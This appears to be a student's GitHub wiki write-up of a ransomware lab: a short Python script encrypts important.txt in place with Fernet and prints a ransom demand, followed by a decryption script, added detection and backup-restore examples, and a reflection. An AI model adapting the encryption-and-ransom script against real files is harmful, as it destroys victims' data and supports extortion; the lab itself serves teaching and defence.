Project 4: Ransomware and Mitigation - FlameSpyro/Tech-Journal GitHub Wiki

Project 4: Ransomware and Mitigation

Ransomware Creation

  • In this lab I created a very simple script that encrypts a single file called important.txt.
  • This was all done on the xubuntu-lan machine, where I installed pip for Python 3 and the cryptography package that provides Fernet (the script will not import without it):
sudo apt update
sudo apt install python3-pip
pip3 install cryptography
  • I created the ransomware script here:
# import required module
from cryptography.fernet import Fernet

# Create a key that will be used for encryption/decryption
key = Fernet.generate_key()

# store the key in a file (leaving the key next to the victim's file is what
# makes this lab version trivially reversible; a real attacker would keep it
# off the victim machine)
with open('filekey.key', 'wb') as filekey:
    filekey.write(key)

# reading the key back from the file
with open('filekey.key', 'rb') as filekey:
    key = filekey.read()

# using the generated key
fernet = Fernet(key)

# opening the original file to encrypt
with open('important.txt', 'rb') as file:
    original = file.read()

# encrypting the file (Fernet = AES-128-CBC plus an HMAC-SHA256 tag, so the
# result is authenticated as well as encrypted)
encrypted = fernet.encrypt(original)

# opening the file in write mode and
# overwriting the original with the encrypted data
with open('important.txt', 'wb') as encrypted_file:
    encrypted_file.write(encrypted)

# Message
print("You have been had! Pay me 1 billion bucks for the file to be decrypted!")
print(":)")

Decryption Script

  • I created a script that reads the key file written by the previous script and uses it to decrypt important.txt in place:
# import required module
from cryptography.fernet import Fernet

# opening the key
with open('filekey.key', 'rb') as filekey:
    key = filekey.read()
  
# using the key
fernet = Fernet(key)
 
# opening the encrypted file
with open('important.txt', 'rb') as enc_file:
    encrypted = enc_file.read()
 
# decrypting the file
decrypted = fernet.decrypt(encrypted)
 
# opening the file in write mode and
# writing the decrypted data
with open('important.txt', 'wb') as dec_file:
    dec_file.write(decrypted)
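The two scripts above always succeed because the key file sits beside the encrypted file. The following is an added example, not code from the original page: it wraps the same Fernet encrypt/decrypt steps in functions and then shows what the scripts do not, namely that decryption with a lost or wrong key, or of a token whose ciphertext was modified, fails closed with `InvalidToken` rather than producing garbage, and that a responder can recognise a Fernet-encrypted file and read the encryption time out of the token header. The function names, the temporary directory and the sample file contents are my own constructions; the only dependency is the `cryptography` package installed above.

```python
# Added example (not part of the original wiki page).  Requires `cryptography`.
import base64
import os
import tempfile
import time

from cryptography.fernet import Fernet, InvalidToken

# Token layout (Fernet spec): 0x80 | 8-byte big-endian timestamp | 16-byte IV
#                             | AES-128-CBC ciphertext | 32-byte HMAC-SHA256
HEADER_LEN = 1 + 8 + 16
TAG_LEN = 32


def encrypt_file(path: str, key: bytes) -> None:
    """Encrypt `path` in place, the same way the lab's ransomware script does."""
    with open(path, "rb") as f:
        plaintext = f.read()
    with open(path, "wb") as f:
        f.write(Fernet(key).encrypt(plaintext))


def decrypt_file(path: str, key: bytes) -> bool:
    """Decrypt `path` in place.  Returns False and leaves the file untouched if
    the key is wrong or the token was modified (Fernet verifies the HMAC first)."""
    with open(path, "rb") as f:
        token = f.read()
    try:
        plaintext = Fernet(key).decrypt(token)
    except InvalidToken:
        return False
    with open(path, "wb") as f:
        f.write(plaintext)
    return True


def is_fernet_token(data: bytes) -> bool:
    """Responder heuristic: with current timestamps the decoded token starts
    80 00 00 00 00, so the text begins 'gAAAAA'; the ciphertext is whole AES blocks."""
    if not data.startswith(b"gAAAAA"):
        return False
    try:
        raw = base64.urlsafe_b64decode(data)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    body = len(raw) - HEADER_LEN - TAG_LEN
    return raw[0] == 0x80 and body >= 16 and body % 16 == 0


def token_timestamp(data: bytes) -> int:
    """Unix time at which the token was minted, i.e. when the file was encrypted."""
    return int.from_bytes(base64.urlsafe_b64decode(data)[1:9], "big")


def demo() -> dict:
    """Encrypt a constructed file, then try wrong-key, tampered and correct decryption."""
    key = Fernet.generate_key()
    original = b"constructed sample: Q3 numbers, do not lose\n"
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.join(workdir, "important.txt")
        with open(path, "wb") as f:
            f.write(original)

        before = int(time.time())
        encrypt_file(path, key)
        after = int(time.time())
        with open(path, "rb") as f:
            token = f.read()

        # What a responder sees on disk: a Fernet token carrying its own timestamp.
        looks_like_fernet = is_fernet_token(token)
        ts = token_timestamp(token)

        # Victim without filekey.key: a different key fails closed, file unchanged.
        wrong_key_ok = decrypt_file(path, Fernet.generate_key())

        # Flip one ciphertext bit: the HMAC rejects it instead of decrypting to junk.
        raw = bytearray(base64.urlsafe_b64decode(token))
        raw[HEADER_LEN] ^= 0x01  # first byte of the AES-CBC ciphertext
        with open(path, "wb") as f:
            f.write(base64.urlsafe_b64encode(bytes(raw)))
        tampered_ok = decrypt_file(path, key)

        # Put the genuine token back and decrypt with the real key.
        with open(path, "wb") as f:
            f.write(token)
        right_key_ok = decrypt_file(path, key)
        with open(path, "rb") as f:
            recovered = f.read()

    return {
        "looks_like_fernet": looks_like_fernet,
        "timestamp_in_window": before <= ts <= after,
        "plaintext_visible_in_token": original in token,
        "wrong_key_ok": wrong_key_ok,
        "tampered_ok": tampered_ok,
        "right_key_ok": right_key_ok,
        "recovered_matches": recovered == original,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The `gAAAAA` prefix check is cheap enough to run over a whole directory tree when triaging a suspected infection, and the embedded timestamp gives the encryption time for the incident timeline even if file mtimes were reset. It only identifies Fernet output, not ransomware in general; other families use their own formats.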

Prevention

  • Using tar, these commands create a gzip-compressed backup of the chosen file(s), copy it somewhere the infected machine cannot overwrite it, and extract it again when needed. Note that -cf on its own writes a plain, uncompressed archive no matter what the file is called; -z is what applies gzip:
tar -czf backup.tar.gz important.txt
cp backup.tar.gz <target dir>
tar -xzvf backup.tar.gz
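A backup only helps if you notice the files changed and can get the originals back. The following is an added example, not part of the original page: it does the same compressed backup with Python's tarfile module (the equivalent of tar -czf), records a SHA-256 manifest of the protected files, then simulates the in-place overwrite that the lab's ransomware performs, detects exactly which files changed, and restores only those from the archive. The file names, contents, directory layout and function names are my own constructions; it needs nothing beyond the standard library.

```python
# Added example (not part of the original wiki page); standard library only.
import hashlib
import os
import tarfile
import tempfile


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str, names) -> dict:
    """Map each protected file (relative to `root`) to its SHA-256 hex digest."""
    return {name: sha256_of(os.path.join(root, name)) for name in names}


def make_backup(root: str, names, archive: str) -> None:
    """Write a gzip-compressed tar of the named files (what `tar -czf` does)."""
    with tarfile.open(archive, "w:gz") as tar:
        for name in names:
            tar.add(os.path.join(root, name), arcname=name)


def detect_changes(root: str, manifest: dict) -> list:
    """Names whose current hash differs from the manifest, or that are missing."""
    changed = []
    for name, digest in manifest.items():
        path = os.path.join(root, name)
        if not os.path.exists(path) or sha256_of(path) != digest:
            changed.append(name)
    return sorted(changed)


def restore(archive: str, root: str, names) -> None:
    """Copy the named members out of the archive into `root`, writing the bytes
    ourselves so an archive entry can never choose a path outside `root`."""
    real_root = os.path.realpath(root)
    with tarfile.open(archive, "r:gz") as tar:
        for name in names:
            member = tar.getmember(name)
            target = os.path.realpath(os.path.join(real_root, name))
            if not member.isfile() or not target.startswith(real_root + os.sep):
                raise ValueError(f"refusing to restore {name!r}")
            with tar.extractfile(member) as src, open(target, "wb") as dst:
                dst.write(src.read())


def demo() -> dict:
    """Baseline, simulated ransomware hit, detection and restore, all in temp dirs."""
    names = ["important.txt", "notes.txt"]
    contents = {  # constructed sample files
        "important.txt": b"constructed sample: the file the lab encrypts\n",
        "notes.txt": b"constructed sample: an unrelated file\n",
    }
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as vault:
        for name, data in contents.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(data)

        # 1. Baseline: hash manifest plus compressed backup in a separate location
        #    (in real use a host or mount the victim machine cannot write to).
        manifest = build_manifest(root, names)
        archive = os.path.join(vault, "backup.tar.gz")
        make_backup(root, names, archive)
        with open(archive, "rb") as f:
            archive_is_gzip = f.read(2) == b"\x1f\x8b"
        clean = detect_changes(root, manifest)

        # 2. Simulate the ransomware overwriting important.txt in place.
        with open(os.path.join(root, "important.txt"), "wb") as f:
            f.write(b"gAAAAAB... constructed stand-in for a Fernet token\n")
        hit = detect_changes(root, manifest)

        # 3. Restore only what changed and re-check against the manifest.
        restore(archive, root, hit)
        after_restore = detect_changes(root, manifest)
        with open(os.path.join(root, "important.txt"), "rb") as f:
            recovered = f.read()

    return {
        "archive_is_gzip": archive_is_gzip,
        "clean": clean,
        "hit": hit,
        "after_restore": after_restore,
        "recovered_matches": recovered == contents["important.txt"],
    }


if __name__ == "__main__":
    print(demo())
```

The manifest is the piece that turns a backup into monitoring: rerun `detect_changes` on a schedule and a burst of changed files is the signal. Keep the manifest and the archive with the backup, not in the protected directory, for the same reason the backup itself must be isolated.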

Reflection

  • Ransomware is a very dangerous tool used by attackers that puts files under lock and key. Depending on the group, the attacker could receive payment and not even decrypt the files. Many scenarios could occur. It's important to monitor what occurs in your directories and create a proper and isolated backup to prevent this. When it comes to other creations of my ransomware, it is not exactly effective, but it could be modified for a more ethical-hacking environment, and it accomplishes the goal of encrypting/decrypting files.